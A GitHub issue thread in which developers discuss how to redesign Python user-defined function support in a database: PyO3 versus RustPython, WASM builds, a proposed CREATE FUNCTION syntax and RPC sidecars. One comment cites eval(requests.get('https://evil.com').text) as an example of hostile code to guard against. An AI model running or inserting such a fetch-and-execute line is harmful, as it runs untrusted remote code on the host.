Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Python UDF Support #3777

Open
3 tasks
tisonkun opened this issue Apr 23, 2024 · 5 comments
Open
3 tasks

Python UDF Support #3777

tisonkun opened this issue Apr 23, 2024 · 5 comments
Labels
help wanted Extra attention is needed

Comments

@tisonkun
Copy link
Collaborator

tisonkun commented Apr 23, 2024

What problem does the new feature solve?

This supersedes:

We'd revisit the support for Python UDF. Currently, it suffers with the following challenges:

  1. It's somewhat a hacky solution that we use sql="..." in decorator args for inputs. Ideally, we should build a solution like PL/Python in Postgres to describe the args and return types, as well as embedded scripts, instead of depending on a series of random conventions.
  2. The upstream RustPython doesn't support GC yet, and thus, we can hardly catch up with the upstream, which is evolving quickly.
  3. It's still undetermined how to support multiple Python versions with the PyO3 backend.

What does the feature do?

There are several tasks we can do to improve the situation:

For supporting multiple Python versions with the PyO3 backend, here are several related threads:

@tisonkun
Copy link
Collaborator Author

@discord9 Now I'd prefer to keep the pyo3 feature gate but drop the RustPython support. And thus the default binary doesn't support Python scripting at all. It seems quite subtle and challenging to handle host Python environment in our distribution.

We may still need a design for the whole Python UDF with this distribution decision. And the current script table solution can suck from #2510.

@sundy-li
Copy link

sundy-li commented May 17, 2024

We have also encountered this issue in databendlabs/databend#15494 via pyo3.

Dynamic lib link is unacceptable in distribution release.

Maybe we can build the python codes into wasm?

https://wasmer.io/posts/py2wasm-a-python-to-wasm-compiler
https://gregoryszorc.com/docs/pyoxidizer/main/pyembed.html

@tisonkun
Copy link
Collaborator Author

tisonkun commented May 20, 2024

@sundy-li Thanks for participating in this thread.

I'm afraid that employing the WASM solution would be nothing better than the RustPython solution, both of which can ship the basic Python support without linkage issues.

However, the major use cases of Python UDF are to integrate with the board scientific computing (scipy), data analyzing (numpy, pandas), and ML/AI ecosystem. All of them require a full CPython environment as well as its (C) extension support.

In the last weekend, I made a draft proposal that, at least in GreptimeDB, we can implement Python UDFs with:

  1. Support CRAETE FUNCTION syntax. A demo can be:
CREATE FUNCTION udf_name(arg0 [opt_ty0], ...)
RETURNS (ret0 [opt_ty0], ...) AS 
$$
...
$$
LANGUAGE python3;
  1. Run a CreateFunctionProcedure to register the UDF to the FUNCTION_REGISTRY, and also update the global scripts table.
  2. Then, leverage the current UDF framework to support querying Python UDF as normal UDF.

We will still have a feature pyo3_backend or sth. similar so that whether the Python UDF is able to run is determined at runtime.

Upon failures, a new server will load the scripts table and register all the UDFs on restarted. Other nodes will be notified on the new UDF registered the same as the new table created following the meta server pub-sub mechanism.

In this way, we don't need the "script engine" and the whole HTTP endpoints at all and fully employ the SQL standards. Thus, we can avoid a lot of confusions and unalignments we found previously (#2434 #2532).

Open questions

Following PG's CREATE FUNCTION docs, functions are registered per schema scoped and can be restricted with the permission model. But in our first version, we can use a globally shared scripts table, and later break it down per schemas (or add a schema column to describe its owner/scope).

@Zheaoli
Copy link

Zheaoli commented May 21, 2024

Maybe we can build the Python codes into wasm?

WASM is a very bad idea. I have tried something like this before in similar circumstance(Gateway UDF/Custom Plugin)

Python has official WASM support but is still in the experimental phase. By the way, if you choose WASM, you will drop most of the C extension support defaults.

The challenges of the Python UDF in my mind are following below:

  1. The Python interpreter version supports; how do you choose the Python version you support?
  2. How do you install your own package?
  3. The resource restricts, and the evil code protects eval(requests.get("https://evil.com").text)

In my old experience, Many Gateway developers and me choose to use the RPC as the solution

  1. We provide a series SDK or official docker image. People run the image/SDK code their own
  2. We register the RPC endpoint like CREATE UDF ENDPOINT 'abc.abc.com'
  3. People can run the customize code their own.

@sundy-li
Copy link

sundy-li commented May 21, 2024

In my old experience, Many Gateway developers and me choose to use the RPC as the solution

Yes, we have external function to work this way. It works, but it's not efficient because we need to pass the argument column through the rpc network.

  1. https://medium.com/@chasea.romano/ryan-wanted-to-clarify-for-your-readers-snowflake-does-not-convert-python-to-sql-738b6b135fbc
  2. https://docs.snowflake.com/en/developer-guide/snowpark/python/creating-session

seems snowpark is a sidecar container.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
help wanted Extra attention is needed
Projects
None yet
Development

No branches or pull requests

3 participants